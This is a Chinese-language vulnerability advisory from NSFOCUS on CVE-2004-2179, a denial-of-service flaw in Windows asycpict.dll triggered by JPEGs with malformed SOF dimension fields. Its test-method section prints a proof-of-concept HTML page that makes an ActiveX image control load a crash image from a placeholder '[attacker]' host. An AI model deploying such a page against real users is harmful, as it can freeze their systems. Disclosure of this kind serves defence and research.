首页 -> 安全研究

安全研究

安全漏洞
Microsoft Windows asycpict.dll远程拒绝服务漏洞

发布日期:2004-10-15
更新日期:2004-10-19

受影响系统:
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows ME
Microsoft Windows 2003
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
Microsoft Windows 2000SP2
Microsoft Windows 2000SP1
Microsoft Windows 2000
描述:
BUGTRAQ  ID: 11412
CVE(CAN) ID: CVE-2004-2179

Microsoft Windows是微软开发的操作系统。

Microsoft Windows处理JPEG图象的asycpict.dll存在问题,远程攻击者可以利用这个漏洞构建恶意文件,诱使用户访问,使系统崩溃。

John Bissell报告远程用户可以建立一个HTML,当目标用户装载处理时,会调用Microsoft ActiveX图象控件使用'asycpict.dll'来处理图象。远程工具字和可以构建特殊的JPEG图象,当通过前一个描述方法装载时,会消耗目标系统大量内存,导致拒绝服务,需要重新启动获得正常功能。

问题存在于软件没有正确验证SOF marker的图象宽度和图象长度字段,远程用户可以通过在图象dimension字段设置4个连续的0xFF字节,让用户访问此畸形文件可触发此漏洞。

<*来源:John Bissell (monkey321_1@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109779025728561&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

John Bissell (monkey321_1@hotmail.com)提供了如下测试方法:

<HTML>
<HEAD>
<TITLE>Think of something clever!</TITLE>
</HEAD>
<BODY>
<OBJECT ID="ExploitImage" WIDTH="96" HEIGHT="96"
CLASSID="CLSID:D4A97620-8E8F-11CF-93CD-00AA00C08FDF"
CODEBASE="http://activex.microsoft.com/controls/mspert10.cab">
<PARAM NAME="BorderStyle" VALUE="0">
<PARAM NAME="SizeMode" VALUE="3">
<PARAM NAME="Size" VALUE="2540;2540">
<PARAM NAME="PicturePath" VALUE="http://[attacker]/freeze_system.jpg">
<PARAM NAME="PictureAlignment" VALUE="0">
<PARAM NAME="VariousPropertyBits" VALUE="19">
</OBJECT>
</BODY>
</HTML>

不过在Windows XP SP2系统中调用此页面,其DLL没有被装载。

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:3776
严重程度:5(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障